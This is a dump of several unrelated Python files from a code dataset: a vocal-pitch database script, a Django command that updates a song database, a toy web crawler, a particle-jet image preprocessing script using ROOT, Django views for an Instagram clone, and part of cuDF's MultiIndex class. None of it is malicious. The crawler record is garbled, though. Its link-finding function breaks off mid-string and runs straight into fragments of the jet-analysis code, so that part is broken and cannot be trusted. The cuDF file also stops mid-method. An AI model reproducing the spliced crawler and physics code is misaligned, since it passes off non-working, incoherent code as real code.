)\n\n\tpitch_list = get_pitch_list( vsong_iframes, srate, chunk_size, chunk_overlap )\n\n\tsession.query( VocalPitch ).filter( VocalPitch.song_title == song.title ).delete()\n\tfor idx,freq,mag in pitch_list:\n\t\tvocal_pitch = VocalPitch()\n\t\tvocal_pitch.song_title = song.title\n\t\tvocal_pitch.n_start = idx\n\t\tvocal_pitch.n_end = (idx + chunk_size)\n\t\tvocal_pitch.frequency = freq\n\t\tsession.add( vocal_pitch )\n\t\t\n\n\n\n\ndef do_it( song_title, vsong_path ):\n\tsession = get_sqla_session()\n\ttry:\n\t\tgen_vocal_pitches( session, song_title, vsong_path )\n\t\tsession.commit()\n\texcept Exception:\n\t\ttraceback.print_exc()\n\t\tsession.rollback()\t\n\tsession.close()\n\n\n\n\n\nsong_title = sys.argv[1]\nvsong_path = sys.argv[2]\ndo_it( song_title, vsong_path )\n","sub_path":"gen_vocal_pitches.py","file_name":"gen_vocal_pitches.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"319560734","text":"from django.core.management import BaseCommand\nimport iidxrank.models as models\nimport update.updatedb as updatedb\n\nclass Command(BaseCommand):\n help = \"update all song db from textage.cc\"\n\n def add_arguments(self, parser):\n parser.add_argument('--set_version', type=int, help='specific version of song version')\n parser.add_argument('--test', type=int, help='only for test (not actually update record)')\n\n def handle(self, *args, **options):\n version = -1\n if (options['set_version']):\n version = options['set_version']\n if (options['test']):\n updatedb.TEST = options['test']\n updatedb.update_from_textage(version)\n","sub_path":"update/management/commands/updateSongTextage.py","file_name":"updateSongTextage.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"504232166","text":"NUMBER_OF_BUCKETS = 10 # number of buckets in index list\r\nMAX_PAGES = 5 # number of pages to crawl\r\n\r\n\r\ndef get_page(url):\r\n try:\r\n import urllib\r\n return urllib.urlopen(url).read()\r\n except:\r\n return \"\"\r\n\r\n\r\ndef union(p, q):\r\n for e in q:\r\n if e not in p:\r\n p.append(e)\r\n\r\n\r\ndef get_next_target(page):\r\n start_link = page.find(' math.pi):\n phi -= 2*math.pi\n # print(\"new again phi: %f\" % phi)\n eta = eta-etajet\n # print('phi after centre: %f' % phi)\n\n return phi, eta\n\ndef findMaxSubmax(jEvent, pEvent, j, histsubmaxcheck):\n maxm = jEvent.pIndex[j][0]\n\n for k, index in enumerate(jEvent.pIndex[j]):\n#index will give the particle index, eg [7, 21, 32], k gives 0, 1, 2\n # print(\"\\t\\t\\tpt[%d] = %f\" % (jEvent.pIndex[j][k], pEvent.pt[jEvent.pIndex[j][k]]))\n #events[0].pt[event[1].pIndex[j][k]] #how to tap into event number on other tree\n #tree.event.pt[event.pIndex[j][k]] #how to tap into event number on other tree\n \n #finding the particle in the jet with the highest pt\n if pEvent.pt[jEvent.pIndex[j][k]] > pEvent.pt[maxm]:\n maxm = jEvent.pIndex[j][k]\n # print(\"\\t\\tmax: %d\" % maxm)\n phi_maxm = getPhi(pEvent, maxm)\n eta_maxm = getEta(pEvent, maxm)\n submax = 0\n phi_submax = 0\n eta_submax = 0\n if(len(jEvent.pIndex[j])>1):\n if (maxm == jEvent.pIndex[j][0]):\n submax = jEvent.pIndex[j][1]\n else:\n submax = jEvent.pIndex[j][0]\n for k, index in enumerate(jEvent.pIndex[j]): #finding the particle in the jet with the second highest pt\n\n if ((pEvent.pt[submax] < pEvent.pt[jEvent.pIndex[j][k]]) and (pEvent.pt[jEvent.pIndex[j][k]] < pEvent.pt[maxm])):\n submax = jEvent.pIndex[j][k]\n # print(\"\\t\\tsubmax: %d\" % submax)\n # \n phi_submax = getPhi(pEvent, submax)\n eta_submax = getEta(pEvent, submax)\n\n # print(\"pt[maxm] for jet %d: %f\" % (k, pEvent.pt[maxm]))\n # print(\"pt[submax] for jet %d: %f\" % (k, pEvent.pt[submax]))\n\n\n histsubmaxcheck.Fill(pEvent.pt[maxm], pEvent.pt[submax])\n\n return phi_maxm, eta_maxm, phi_submax, eta_submax\n\ndef fRotate(jEvent, j, phi, eta, phi_maxm, eta_maxm, phi_submax, eta_submax):\n if(len(jEvent.pIndex[j])>1):\n # print(\"phi before rotate: %f\" % phi)\n # print(\"phi_maxm to be rotated around: %f\" % phi_maxm)\n star = math.atan2((eta_maxm-eta_submax), (phi_maxm-phi_submax))\n\n alpha = math.atan2(eta,phi) #fill in numbers\n r = math.sqrt(math.pow(phi, 2) + math.pow(eta, 2))\n phi = r * math.cos(alpha-star)\n eta = r * math.sin(alpha-star)\n\n # print('phi after rotate %f' % phi)\n\n\n\n return phi, eta\n\ndef fTranslate(phi, eta, phi_maxm, eta_maxm):\n # print(\"phi_maxm = %f\" % phi_maxm)\n # print(\"eta_maxm = %f\" % eta_maxm)\n\n # print(\"phi before translate = %f\" % phi)\n # print(\"eta before translate = %f\" % eta)\n\n phi = phi - phi_maxm\n eta = eta - eta_maxm\n # print(\"phi after translate = %f\" % phi)\n # print(\"eta after translate = %f\\n\" % eta)\n\n return phi, eta\n\ndef fReflect_Fill_Print(output, iEvent, jEvent, j, phiTempV, etaTempV, ptTempV, sumEtaPos, sumEtaNeg, histReflect, histJetTemp, collisionType):\n if(len(jEvent.pIndex[j])>1):\n # if(len(jEvent.pIndex[j])>1):\n for i, a in enumerate(etaTempV):\n if(sumEtaPos < sumEtaNeg):\n a = -1*a\n #fill the histogram for reflection\n histReflect.Fill(phiTempV[i], a, ptTempV[i])\n #fill a temporary histogram with data from one jet\n histJetTemp.Fill(phiTempV[i], a, ptTempV[i])\n\n printOutput(output, j, iEvent, histJetTemp, dimension, collisionType)\n\n return etaTempV\n\ndef 
fNormalize(ptTempV):\n outVector = []\n ptSum = np.sum(ptTempV)\n for i in ptTempV:\n outVector.append(i/ptSum)\n return outVector\n\n # for i, a in enumerate(etaTempV):\n # histNormalize.Fill(phiTempV[i], a, (ptTempV[i]/eTot))\n # return histNormalize\n\n # if(eTot > 0):\n # print 'NOTE'\n # else:\n # print 'wut'\n\ndef readTree(filename1, filename2, fileOut, dimension, collisionType, folder):\n\n fIn = ROOT.TFile(filename1, \"READ\")\n tree = fIn.Get(\"tree\")\n tree.Print()\n #read in the other tree\n fIn2 = ROOT.TFile(filename2, \"READ\")\n jetTree = fIn2.Get(\"jetTree\")\n jetTree.Print()\n\n histBefore = ROOT.TH2F(\"histBefore\", \"histBefore\", dimension, -2*math.pi, 2*math.pi, dimension, -5, 5) #bin bound bound bin bound bound\n histBefore.GetXaxis().SetTitle(\"phi\");\n histBefore.GetYaxis().SetTitle(\"eta\");\n histBefore.GetZaxis().SetTitle(\"counts weighted by pt\");\n\n histCentre = ROOT.TH2F(\"histCentre\", \"histCentre\", dimension, -HIST_BOUND, HIST_BOUND, dimension, -HIST_BOUND, HIST_BOUND) #bin bound bound bin bound bound\n histCentre.GetXaxis().SetTitle(\"phi\");\n histCentre.GetYaxis().SetTitle(\"eta\");\n histCentre.GetZaxis().SetTitle(\"counts weighted by pt\");\n\n histRotate = ROOT.TH2F(\"histRotate\", \"histRotate\", dimension, -HIST_BOUND, HIST_BOUND, dimension, -HIST_BOUND, HIST_BOUND) #bin bound bound bin bound bound\n histRotate.GetXaxis().SetTitle(\"phi\");\n histRotate.GetYaxis().SetTitle(\"eta\");\n histRotate.GetZaxis().SetTitle(\"counts weighted by pt\");\n\n histTranslate = ROOT.TH2F(\"histTranslate\", \"histTranslate\", dimension, -HIST_BOUND, HIST_BOUND, dimension, -HIST_BOUND, HIST_BOUND) #bin bound bound bin bound bound\n histTranslate.GetXaxis().SetTitle(\"phi\");\n histTranslate.GetYaxis().SetTitle(\"eta\");\n histTranslate.GetZaxis().SetTitle(\"counts weighted by pt\");\n\n histReflect = ROOT.TH2F(\"histReflect\", \"histReflect\", dimension, -HIST_BOUND, HIST_BOUND, dimension, -HIST_BOUND, HIST_BOUND) #bin bound bound bin bound bound\n histReflect.GetXaxis().SetTitle(\"phi\");\n histReflect.GetYaxis().SetTitle(\"eta\");\n histReflect.GetZaxis().SetTitle(\"counts weighted by pt\");\n\n histJetTemp = ROOT.TH2F(\"histJetTemp\", \"histJetTemp\", dimension, -HIST_BOUND, HIST_BOUND, dimension, -HIST_BOUND, HIST_BOUND) # numBins bound bound bin bound bound\n histJetTemp.GetXaxis().SetTitle(\"phi\");\n histJetTemp.GetYaxis().SetTitle(\"eta\");\n histJetTemp.GetZaxis().SetTitle(\"counts weighted by pt\");\n\n histsubmaxcheck = ROOT.TH2F(\"histsubmaxcheck\", \"histsubmaxcheck\", dimension, 0, 100, dimension, 0, 100) # numBins bound bound bin bound bound\n histsubmaxcheck.GetXaxis().SetTitle(\"pt of max\");\n histsubmaxcheck.GetYaxis().SetTitle(\"pt of submax\");\n histsubmaxcheck.GetZaxis().SetTitle(\"counts\");\n\n # histNormalize = ROOT.TH2F(\"histNormalize\", \"histNormalize\", dimension, -HIST_BOUND, HIST_BOUND, dimension, -HIST_BOUND, HIST_BOUND) # numBins bound bound bin bound bound\n # histNormalize.GetXaxis().SetTitle(\"phi\");\n # histNormalize.GetYaxis().SetTitle(\"eta\");\n # histNormalize.GetZaxis().SetTitle(\"counts weighted by pt\");\n\n canvasBefore = ROOT.TCanvas(\"canvasBefore\", \"canvasBefore\")\n canvasCentre = ROOT.TCanvas(\"canvasCentre\", \"canvasCentre\")\n canvasRotate = ROOT.TCanvas(\"canvasRotate\", \"canvasRotate\")\n canvasTranslate = ROOT.TCanvas(\"canvasTranslate\", \"canvasTranslate\")\n canvasReflect = ROOT.TCanvas(\"canvasReflect\", \"canvasReflect\")\n canvasSubmaxCheck = ROOT.TCanvas(\"canvasSubmaxCheck\", 
\"canvasSubmaxCheck\")\n # canvasNormalize = ROOT.TCanvas(\"canvasNormalize\", \"canvasNormalize\")\n\n iEvent = 0\n\n # open('outputC.txt', 'w').close()\n # outputC = open(\"outputC.txt\" , \"w\" )\n\n # open('outputR.txt', 'w').close()\n # outputR = open(\"outputR.txt\" , \"w\" )\n\n # open('outputT.txt', 'w').close()\n # outputT = open(\"outputT.txt\" , \"w\" )\n\n # open('outputF.txt', 'w').close()\n # outputF = open(\"outputF.txt\" , \"w\" )\n\n open(fileOut, 'w').close()\n outputN = open(fileOut , \"w\" )\n\n\n#LOOP: through each event in tree\n for pEvent, jEvent in izip(tree, jetTree): #zip\n # if (iEvent==1):\n # break\n if (iEvent % 100 == 0):\n print(\"Event %d:\" % iEvent)\n #for event in jetTree:\n # print(\"jEvent.nJets is %d\" %jEvent.nJets)\n # print(\"pEvent.nParticles is %d\" %pEvent.nFinalParticles)\n#LOOP: through each jet in event \n for j in range(jEvent.nJets): #j tells you which jet you are in\n # print(\"This is what j is: \")\n # print(j)\n # if(j == 1):\n # break\n\n # print(\"\\tJet number %d\" %j)\n # print(\"\\tjEvent.pIndex[j][0] = %d\" % jEvent.pIndex[j][0])\n \n phiTempV = []\n etaTempV = []\n ptTempV = []\n sumEtaPos = 0\n sumEtaNeg = 0\n sumEtaZero = 0\n\n phi_maxm, eta_maxm, phi_submax, eta_submax = findMaxSubmax(jEvent, pEvent, j, histsubmaxcheck)\n # print('max phi before centre: %f' % phi_maxm)\n # print('for max:')\n phi_maxm, eta_maxm = fCentre(jEvent, j, phi_maxm, eta_maxm)\n # print('for submax:')\n phi_submax, eta_submax = fCentre(jEvent, j, phi_submax, eta_submax)\n # print('now the rest is about the max: \\n')\n # print('phi_max before rotate: %f' % phi_maxm)\n phi_maxR, eta_maxR = fRotate(jEvent, j, phi_maxm, eta_maxm, phi_maxm, eta_maxm, phi_submax, eta_submax)\n # print('phi_max after rotate: %f' % phi_maxR)\n # print('\\n')\n\n for index in (jEvent.pIndex[j]):\n phi, eta = getPhi(pEvent, index), getEta(pEvent, index)\n\n histBefore.Fill(phi, eta, pEvent.pt[index])\n \n phi, eta = fCentre(jEvent, j, phi, eta)\n histCentre.Fill(phi, eta, pEvent.pt[index])\n #centre the max and submax\n \n phi, eta = fRotate(jEvent, j, phi, eta, phi_maxm, eta_maxm, phi_submax, eta_submax)\n histRotate.Fill(phi, eta, pEvent.pt[index])\n\n phi, eta = fTranslate(phi, eta, phi_maxR, eta_maxR)\n histTranslate.Fill(phi , eta, pEvent.pt[index])\n\n\n if(eta > 0):\n sumEtaPos += pEvent.pt[index]\n elif(eta < 0):\n sumEtaNeg += pEvent.pt[index]\n else:\n sumEtaZero += pEvent.pt[index]\n \n etaTempV.append(eta)\n phiTempV.append(phi)\n ptTempV.append(pEvent.pt[index])\n # print ('sum eta pos: %f' % sumEtaPos)\n # print ('sum eta Neg: %f' % sumEtaNeg)\n # print ('sum eta Zero: %f' % sumEtaZero)\n # print ('sum eta pn: %f' % (sumEtaPos + sumEtaNeg))\n\n ptTempV = fNormalize(ptTempV)\n # print 'len pt'\n # print len(ptTempV)\n # print ptTempV[21]\n etaTempV = fReflect_Fill_Print(outputN, iEvent, jEvent, j, phiTempV, etaTempV, ptTempV, sumEtaPos, sumEtaNeg, histReflect, histJetTemp, collisionType)\n # print ('sum eta pn: %f' % (sumEtaPos + sumEtaNeg))\n\n # eTot = sumEtaPos + sumEtaNeg + sumEtaZero\n # histNormalize = fNormalize(jEvent, phiTempV, etaTempV, ptTempV, eTot, histNormalize, dimension, collisionType)\n\n etaTempV = []\n phiTempV = []\n ptTempV = []\n histJetTemp.Reset()\n\n\n \n # printOutput(outputC, j, iEvent, histCentre, dimension, collisionType)\n # printOutput(outputR, j, iEvent, histRotate, dimension, collisionType)\n # printOutput(outputT, j, iEvent, histTranslate, dimension, collisionType)\n # printOutput(outputN, j, iEvent, histNormalize, dimension, 
collisionType)\n # printOutput(outputN, j, iEvent, histReflect, dimension, collisionType)\n# \n \n iEvent+=1\n\n\n #see others for examples of iterating through\n canvasBefore.cd()\n histBefore.Draw(\"LEGO2Z\")\n canvasBefore.SaveAs(folder + \"/\" + filename1.split('.')[0] + \"_\" + str(dimension) + \"_before_pt.pdf\")\n\n canvasCentre.cd()\n # canvasCentre.SetLogz()\n histCentre.Draw(\"LEGO2Z\")\n #https://root.cern.ch/root/html534/guides/users-guide/Histograms.html\n canvasCentre.SaveAs(folder + \"/\" + filename1.split('.')[0] + \"_\" + str(dimension) + \"_centre_pt.pdf\")\n\n canvasRotate.cd()\n # canvasRotate.SetLogz()\n histRotate.Draw(\"LEGO2Z\")\n canvasRotate.SaveAs(folder + \"/\" + filename1.split('.')[0] + \"_\" + str(dimension) + \"_rotate_pt.pdf\")\n\n canvasTranslate.cd()\n # canvasTranslate.SetLogz()\n histTranslate.Draw(\"LEGO2Z\")\n canvasTranslate.SaveAs(folder + \"/\" + filename1.split('.')[0] + \"_\" + str(dimension) + \"_translate_pt.pdf\")\n\n canvasReflect.cd()\n # canvasReflect.SetLogz()\n histReflect.Draw(\"LEGO2Z\")\n canvasReflect.SaveAs(folder + \"/\" + filename1.split('.')[0] + \"_\" + str(dimension) + \"_reflect_pt.pdf\")\n\n canvasSubmaxCheck.cd()\n histsubmaxcheck.Draw(\"LEGO2Z\")\n canvasSubmaxCheck.SaveAs(folder + \"/\" + filename1.split('.')[0] + \"_\" + str(dimension) + \"_submaxCheck_pt.pdf\")\n \n # canvasNormalize.cd()\n # histNormalize.Draw(\"LEGO2Z\")\n # canvasNormalize.SaveAs(\"normalize.pdf\")\n \nif __name__ == \"__main__\":\n\n \n parser = argparse.ArgumentParser()\n parser.add_argument('--data', default='sampleA.root', help='the original root file of event data')\n parser.add_argument('--jets', default='r1.0/sampleAJet.root', help='the original root file of event data')\n parser.add_argument('--type', default='A', help='type of collision(collision ID)')\n parser.add_argument('--dim', default='11', help='dimension of output image', type=int)\n parser.add_argument('--folder', default='r1.0', help='folder to place output image')\n args = parser.parse_args()\n \n filename1=args.data\n filename2=args.jets\n dimension=args.dim\n folder=args.folder\n collisionType=args.type\n\n if(filename1 == \"\"):\n filename1 = raw_input(\"Please provide filename 1 (a .root file from original tree): \")\n if(filename2 == \"\"):\n filename2 = raw_input(\"Please provide filename 2 (a .root file after original tree goes through jet finder): \")\n if(collisionType == \"\"):\n collisionType = raw_input(\"Enter the collision type: \")\n if (dimension == 0):\n dimension = getDimension()\n if(folder == \"\"):\n folder = raw_input(\"Please provide folder where you would like everything to go: \")\n\n#give tree, jettree, output txt, collisiontype= , dimension= \n\n fileOut = folder + \"/\" + filename2.split('/')[1].split('.')[0] + \"Pre\" + str(dimension) + \"_pt.txt\"\n print(\"fileOut: %s\" % fileOut)\n print(\"filename2: %s\" % filename2)\n\n\n print(\"folder: %s\" % folder)\n\n readTree(filename1 = filename1, filename2 = filename2, fileOut = fileOut, dimension = dimension, collisionType = collisionType, folder = folder)\n \n\n\n","sub_path":"JetAnalysis/prept.py","file_name":"prept.py","file_ext":"py","file_size_in_byte":16660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
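The centre/rotate/translate/reflect chain in the record above is standard jet-image preprocessing. The rotation step is a polar-coordinate rotation by the angle of the leading-to-subleading constituent axis; the same arithmetic as fRotate on a toy point (made-up coordinates):

import math

def rotate_point(phi, eta, phi_max, eta_max, phi_sub, eta_sub):
    # identical math to fRotate, minus the jet bookkeeping
    star = math.atan2(eta_max - eta_sub, phi_max - phi_sub)
    alpha = math.atan2(eta, phi)
    r = math.hypot(phi, eta)
    return r * math.cos(alpha - star), r * math.sin(alpha - star)

# a point along the max-to-submax axis lands on the +phi axis after rotation
print(rotate_point(0.3, 0.4, 0.0, 0.0, -0.3, -0.4))  # approx (0.5, 0.0)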
+{"seq_id":"559021802","text":"from django.shortcuts import (\r\n render , \r\n redirect\r\n)\r\nfrom ProfileApp.models import (\r\n Profile,\r\n Follower\r\n)\r\nfrom .models import (\r\n Post , \r\n Comments, \r\n Like, \r\n Story\r\n)\r\nfrom django.shortcuts import get_object_or_404\r\nfrom .forms import (\r\n CommentsForm, \r\n NewPostForm,\r\n PostEditForm\r\n)\r\nfrom django.views.generic import ListView, View\r\nfrom django.contrib.auth.models import User \r\nfrom django.contrib.auth import authenticate , login , logout\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.contrib.auth.mixins import LoginRequiredMixin\r\nfrom django.core.exceptions import ObjectDoesNotExist\r\nfrom datetime import datetime \r\nfrom django.utils import timezone\r\nimport random\r\n# Create your views here.\r\nclass IndexView(ListView, LoginRequiredMixin):\r\n model = Post\r\n template_name='home/index.html'\r\n def get(self, request):\r\n if request.user.is_authenticated : \r\n form = CommentsForm \r\n # posts from people you followed\r\n user = Profile.objects.get(user=self.request.user)\r\n profile_page = Profile.objects.all() \r\n following = user.following.all()\r\n following_ids = []\r\n for x in following:\r\n following_ids.append(x.id) \r\n print(following_ids) \r\n following_ids.append(user.id)\r\n posts_qs = Post.objects.filter(author__id__in=following_ids).order_by('-date')\r\n\r\n #notification\r\n all_posts = Post.objects.filter(author=request.user)\r\n notification = []\r\n for post in all_posts:\r\n like_qs = Like.objects.filter(po=post).order_by('-date')\r\n comments_qs = Comments.objects.filter(po=post).order_by('-date')\r\n\r\n for like in like_qs:\r\n if like.user == request.user :\r\n pass\r\n else:\r\n notification.append(like)\r\n for comment in comments_qs:\r\n if comment.user == request.user :\r\n pass\r\n else:\r\n notification.append(comment)\r\n followers_qs = Follower.objects.filter(influncer=request.user).order_by('-date')\r\n for follower in followers_qs:\r\n if follower == request.user :\r\n pass\r\n else:\r\n notification.append(follower)\r\n # notification.sort(key = lambda date: datetime.strptime(date, \"%m%d%Y %I:%M\"))\r\n\r\n # stories \r\n\r\n me = Profile.objects.get(user=request.user)\r\n my_following = me.following.all()\r\n my_following_stories = []\r\n for following in my_following:\r\n stories_qs = Story.objects.filter(author=following.user)\r\n active = False \r\n now = timezone.now()\r\n for active_story in stories_qs : \r\n if active_story.end_date <= now:\r\n active_story.active = False\r\n active_story.save()\r\n if active_story.active == True :\r\n active = True\r\n else :\r\n pass\r\n if stories_qs.exists():\r\n if active == True:\r\n my_following_stories.append(following.id) \r\n else:\r\n pass\r\n\r\n all_stories = Profile.objects.filter(user__id__in=my_following_stories)\r\n # my stories\r\n my_profile = Profile.objects.get(user=request.user)\r\n my_profile_stories = Story.objects.filter(author=my_profile.user)\r\n now = timezone.now()\r\n for my_sotry in my_profile_stories:\r\n if my_sotry.end_date <= now:\r\n my_sotry.active = False\r\n my_sotry.save()\r\n\r\n #new post form\r\n\r\n post_form = NewPostForm\r\n\r\n # people you my like to follow\r\n p_may_follow = Profile.objects.exclude(user__id__in=following_ids)\r\n if len(p_may_follow) > 5:\r\n y = 5\r\n else:\r\n y = len(p_may_follow)\r\n\r\n\r\n context = {\r\n 'title':'InstaClone',\r\n 'profile':profile_page,\r\n 'profile_stories':profile_page,\r\n 'form':form,\r\n 
'posts':posts_qs, \r\n 'notifications':notification,\r\n 'my_stories':my_profile,\r\n 'stories':all_stories,\r\n 'post_form':post_form,\r\n 'p_may_follow':random.choices(p_may_follow,k=y)\r\n }\r\n return render(self.request,'home/posts.html', context)\r\n else :\r\n return redirect('login')\r\n\r\n@login_required\r\ndef AddCommentView(request, pk):\r\n if request.method == 'POST':\r\n post = get_object_or_404(Post, id=pk)\r\n form = CommentsForm(request.POST)\r\n if form.is_valid():\r\n post_comment = form.cleaned_data.get('post_comment')\r\n comments = Comments(\r\n user=request.user,\r\n comment = post_comment,\r\n po = post\r\n )\r\n comments.save() \r\n return redirect('index')\r\n\r\n@login_required\r\ndef LikeAndDislikeView(request, pk):\r\n post = get_object_or_404(Post, id=pk)\r\n \r\n like = Like(\r\n user=request.user,\r\n po=post\r\n )\r\n liker = Like.objects.filter(po=post, user=request.user)\r\n if liker:\r\n post.post_likes_number -=1\r\n post.save()\r\n liker.delete() \r\n else: \r\n post.post_likes_number +=1\r\n post.save()\r\n like.save() \r\n return redirect('index')\r\n \r\n@login_required\r\ndef StoriesDetiels(request, pk):\r\n now = timezone.now()\r\n profile = get_object_or_404(Profile, id=pk)\r\n stories = []\r\n stories_qs = Story.objects.filter(author=profile.user)\r\n for story in stories_qs :\r\n if story.active == True:\r\n stories.append(story)\r\n\r\n for my_story in stories:\r\n my_story.views += 1\r\n my_story.collor = 'B'\r\n my_story.save()\r\n\r\n context = {\r\n 'stories':stories,\r\n 'first_story':stories,\r\n 'profile_stories':profile,\r\n }\r\n\r\n if len(stories)>0:\r\n\r\n context.update({\r\n 'stories':stories[1:],\r\n 'first_story':stories[0],\r\n 'profile_stories':profile,\r\n }) \r\n\r\n return render(request, 'home/story_detiels.html', context)\r\n\r\n@login_required\r\ndef exploreView(request):\r\n\r\n posts = Post.objects.all().order_by('-post_likes_number')\r\n\r\n all_posts = Post.objects.filter(author=request.user)\r\n notification = []\r\n for post in all_posts:\r\n like_qs = Like.objects.filter(po=post)\r\n comments_qs = Comments.objects.filter(po=post)\r\n for like in like_qs:\r\n if like.user == request.user :\r\n pass\r\n else:\r\n notification.append(like)\r\n for comment in comments_qs:\r\n if comment.user == request.user :\r\n pass\r\n else:\r\n notification.append(comment)\r\n context={\r\n 'posts':posts,\r\n 'notifications':notification\r\n \r\n }\r\n\r\n return render(request, 'home/explore.html', context)\r\n\r\n@login_required\r\ndef SearchView(request):\r\n profiles = User.objects.all()\r\n myFilter = request.GET.get('myUsers')\r\n if myFilter != ' ' and myFilter is not None:\r\n profiles = profiles.filter(username__icontains=myFilter)\r\n\r\n context = {\r\n 'myUsers':profiles,\r\n }\r\n\r\n return render (request, 'home/search.html', context)\r\n\r\n@login_required\r\ndef AddPostView(request):\r\n print(f'this is request post {request.POST}')\r\n if request.method == 'POST':\r\n print(f'this is request post after {request.POST}')\r\n form = NewPostForm(request.POST, request.FILES)\r\n \r\n if form.is_valid():\r\n image = form.cleaned_data.get('image')\r\n discription = form.cleaned_data.get('discription')\r\n post_type = form.cleaned_data.get('post_type')\r\n print(f'this is request post valid {request.POST}')\r\n if post_type == 'F':\r\n Post.objects.create(\r\n author = request.user,\r\n image = image,\r\n discription = discription\r\n )\r\n else:\r\n Story.objects.create(\r\n author = request.user,\r\n image = 
image,\r\n discription = discription\r\n )\r\n return redirect('index')\r\n\r\ndef DeletPostView(request, pk):\r\n post = get_object_or_404(Post, id=pk)\r\n if post.author == request.user:\r\n post.delete()\r\n return redirect('index')\r\n \r\ndef EditPostView(request, pk):\r\n post = Post.objects.get(id=pk)\r\n context = {\r\n 'post':post,\r\n }\r\n\r\n if post.author == request.user:\r\n form = PostEditForm(instance=post)\r\n if request.method == 'POST':\r\n form = PostEditForm(request.POST, instance=post) # bind the form to the Post instance, not its discription field\r\n if form.is_valid():\r\n form.save()\r\n return redirect('index')\r\n\r\n context.update({\r\n 'form':form\r\n }) \r\n return render(request,'home/editpost.html', context)\r\n else:\r\n return redirect('index')\r\n \r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"363559258","text":"# Copyright (c) 2019, NVIDIA CORPORATION.\n\nimport pandas as pd\nimport numpy as np\nimport warnings\n\nfrom collections.abc import Sequence\n\nfrom cudf.dataframe import columnops\nfrom cudf.comm.serialize import register_distributed_serializer\nfrom cudf.dataframe.index import Index, StringIndex\n\n\nclass MultiIndex(Index):\n \"\"\"A multi-level or hierarchical index.\n\n Provides N-Dimensional indexing into Series and DataFrame objects.\n\n Properties\n ---\n levels: Labels for each category in the index hierarchy.\n codes: Assignment of individual items into the categories of the hierarchy.\n names: Name for each level\n \"\"\"\n\n def __init__(self, levels, codes=None, labels=None, names=None):\n self.names = names\n column_names = []\n if labels:\n warnings.warn(\"the 'labels' keyword is deprecated, use 'codes' \"\n \"instead\", FutureWarning)\n if labels and not codes:\n codes = labels\n if isinstance(names, (Sequence,\n pd.core.indexes.frozen.FrozenNDArray,\n pd.core.indexes.frozen.FrozenList)):\n if sum(x is None for x in names) > 1:\n column_names = list(range(len(codes)))\n else:\n column_names = names\n elif names is None:\n column_names = list(range(len(codes)))\n else:\n column_names = names\n if len(codes) == 0:\n raise ValueError('MultiIndex codes can not be empty.')\n import cudf\n if not isinstance(codes, cudf.dataframe.dataframe.DataFrame) and\\\n not isinstance(codes[0], (Sequence,\n pd.core.indexes.frozen.FrozenNDArray)):\n raise TypeError('Codes is not a Sequence of sequences')\n if not isinstance(codes, cudf.dataframe.dataframe.DataFrame):\n self.codes = cudf.dataframe.dataframe.DataFrame()\n for idx, code in enumerate(codes):\n code = np.array(code)\n self.codes.add_column(column_names[idx],\n columnops.as_column(code))\n else:\n self.codes = codes\n self.levels = levels\n self._validate_levels_and_codes(self.levels, self.codes)\n self.name = None\n self.names = names\n\n def _validate_levels_and_codes(self, levels, codes):\n levels = np.array(levels)\n if len(levels) != len(codes.columns):\n raise ValueError('MultiIndex has unequal number of levels and '\n 'codes and is inconsistent!')\n code_length = len(codes[codes.columns[0]])\n for index, code in enumerate(codes):\n if code_length != len(codes[code]):\n raise ValueError('MultiIndex length of codes does not match '\n 'and is inconsistent!')\n for index, code in enumerate(codes):\n if codes[code].max() > len(levels[index])-1:\n raise ValueError('MultiIndex code %d contains value %d larger '\n 'than maximum level size at this position')\n\n def copy(self, deep=True):\n mi = MultiIndex(self.levels.copy(),\n self.codes.copy(deep))\n if self.names:\n mi.names = self.names.copy()\n return mi\n\n def deepcopy(self):\n return self.copy(deep=True)\n\n def __copy__(self):\n return self.copy(deep=True)\n\n def _popn(self, n):\n \"\"\" Returns a copy of this index without the left-most n values.\n\n Removes n names, labels, and codes in order to build a new index\n for results.\n \"\"\"\n from cudf import DataFrame\n codes = DataFrame()\n for idx in self.codes.columns[n:]:\n codes.add_column(idx, self.codes[idx])\n result = MultiIndex(self.levels[n:], codes)\n result.names = self.names[n:]\n return result\n\n def __repr__(self):\n return \"MultiIndex(levels=\" + str(self.levels) +\\\n \",\\ncodes=\" + str(self.codes) + \")\"\n\n @property\n def labels(self):\n warnings.warn(\"This feature is deprecated in pandas and will be\"\n \"dropped from cudf as well.\", FutureWarning)\n return 
self.codes\n\n def _compute_validity_mask(self, df, row_tuple):\n \"\"\" Computes the valid set of indices of values in the lookup\n \"\"\"\n validity_mask = []\n for i, element in enumerate(row_tuple):\n index_of_code_at_level = None\n for level_index in range(len(self.levels[i])):\n if self.levels[i][level_index] == element:\n index_of_code_at_level = level_index\n break\n if index_of_code_at_level is None:\n raise KeyError(element)\n matches = []\n for k, code in enumerate(self.codes[self.codes.columns[i]]):\n if k in validity_mask or len(validity_mask) == 0:\n if code == index_of_code_at_level:\n matches.append(k)\n if len(matches) != 0:\n validity_mask = matches\n return validity_mask\n\n def _get_row_major(self, df, row_tuple):\n valid_indices = self._compute_validity_mask(df, row_tuple)\n from cudf import Series\n result = df.take(Series(valid_indices))\n # Build new index - INDEX based MultiIndex\n # ---------------\n from cudf import DataFrame\n out_index = DataFrame()\n # Select the last n-k columns where n is the number of source\n # levels and k is the length of the indexing tuple\n for k in range(len(row_tuple), len(df.index.levels)):\n out_index.add_column(df.index.names[k],\n df.index.codes[df.index.codes.columns[k]])\n # If there's only one column remaining in the output index, convert\n # it into a StringIndex and name the final index values according\n # to the proper codes.\n if len(out_index.columns) == 1:\n out_index = []\n for val in result.index.codes[result.index.codes.columns[len(result.index.codes.columns)-1]]: # noqa: E501\n out_index.append(result.index.levels[\n len(result.index.codes.columns)-1][val])\n # TODO: Warning! The final index column could be arbitrarily\n # ordered integers, not Strings, so we need to check for that\n # dtype and produce a GenericIndex instead of a StringIndex\n out_index = StringIndex(out_index)\n out_index.name = result.index.names[len(result.index.names)-1]\n result.index = out_index\n else:\n # Otherwise pop the leftmost levels, names, and codes from the\n # 